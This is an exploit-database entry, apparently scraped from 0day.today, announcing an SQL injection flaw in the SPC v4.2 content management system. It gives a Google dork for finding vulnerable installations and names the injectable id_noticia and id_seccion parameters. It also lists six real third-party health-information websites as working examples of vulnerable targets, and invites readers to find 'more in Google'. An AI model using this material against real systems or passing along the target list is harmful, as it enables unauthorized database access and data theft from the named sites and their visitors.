SPC v4.2 - SQL Injection Vulnerability

{"type": "zdt", "lastseen": "2016-04-20T00:03:08", "bulletinFamily": "exploit", "cvelist": [], "history": [], "title": "SPC v4.2 - SQL Injection Vulnerability", "published": "2012-06-05T00:00:00", "href": "http://0day.today/exploit/description/18451", "cvss": {"vector": "NONE", "score": 0}, "description": "Exploit for php platform in category web applications", "hash": "ec04c3cfcea8822e107625177f0de25af8b0dfe75954fe81bfad95057e54f168", "references": [], "objectVersion": "1.0", "edition": 1, "sourceData": " 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n 0 _ __ __ __ 1\r\n 1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n 0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n 1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n 0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n 1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n 0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n 1 \\ \\____/ >> Exploit database separated by exploit 0\r\n 0 \\/___/ type (local, remote, DoS, etc.) 1\r\n 1 1\r\n 0 [x] Official Website: http://www.1337day.com 0\r\n 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1\r\n 0 0\r\n 1 ========================================== 1\r\n 0 Taurus Omar From Inj3ct0r TEAM 1\r\n 1 ========================================== 0\r\n 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1\r\n | |\r\n | C _:_ A | SPC v4.2 - SQL Injection Vulnerability | C _:_ A |\r\n --------------------------------------------------------------------------\r\n\r\n==> ABOUT ME:\r\n--- TAURUS OMAR\r\n--- INDEPENDENT SECURITY RESEARCHER\r\n--- ACCESOILEGAL.BLOGSPOT.COM\r\n--- @omartaurus\r\n--- omar-taurus[at]dragonsecurity[dot]org \r\n--- omar-taurus[at]live[dot]com\r\n \r\n===> INFO:\r\nAuthor : TAURUS OMAR\r\nCategory : Webapps / 0day \r\nTitle Exploit : SPC - SQL Injection Vulnerability \r\nVendor : SPC - Sistemas De Publicacion De Contenido \r\nURL Vendor : www.spc.com.es/\r\nGoogle Dork : intext:Powered by SPC v4.2 \u0160 \r\n\r\n\r\n==> EXAMPLE:\r\nhttp://site.com/frontend/directory/noticia.php?id_noticia=1&PHPSESSID=5403f3b20e75d73adcb0XXXXXXX\r\nhttp://site.com/frontend/directory/seccion.php?id_seccion=14&PHPSESSID=0bac915a2adcb93cf992XXXXXXX\r\n\r\n==> QUIT PARAMETER \r\n&PHPSESSID=5403f3b20e75d73adcb0XXXXXXX\r\n\r\n==> EXPLOIT:\r\nhttp://site.com/frontend/directory/noticia.php?id_noticia=1\r\nhttp://site.com/frontend/directory/seccion.php?id_seccion=14\r\n\r\n==> SAMPLE'S SQLi:\r\nhttp://www.infohipertension.com/frontend/infohipertension/seccion.php?id_seccion=11\r\nhttp://www.impotenciamasculina.com/frontend/impotenciamasculina/noticia.php?id_noticia=598\r\nhttp://www.asmainfantil.com/frontend/asmainfantil/noticia.php?id_noticia=484\r\nhttp://www.incontinenciaurinaria.com/frontend/incontinenciaurinaria/seccion.php?id_seccion=198\r\nhttp://www.infoartritis.com/frontend/infoartritis/seccion.php?id_seccion=208\r\nhttp://www.lacasadelalergico.com/frontend/lacasadelalergico/noticia.php?id_seccion=156&id_noticia=466\r\n\r\n\r\nMORE IN GOOGLE..\r\n\r\n\n\n# 0day.today [2016-04-19] #", "id": "1337DAY-ID-18451", "sourceHref": "http://0day.today/exploit/18451", "modified": "2012-06-05T00:00:00", "reporter": "Taurus Omar", "enchantments": {"vulnersScore": 7.3}}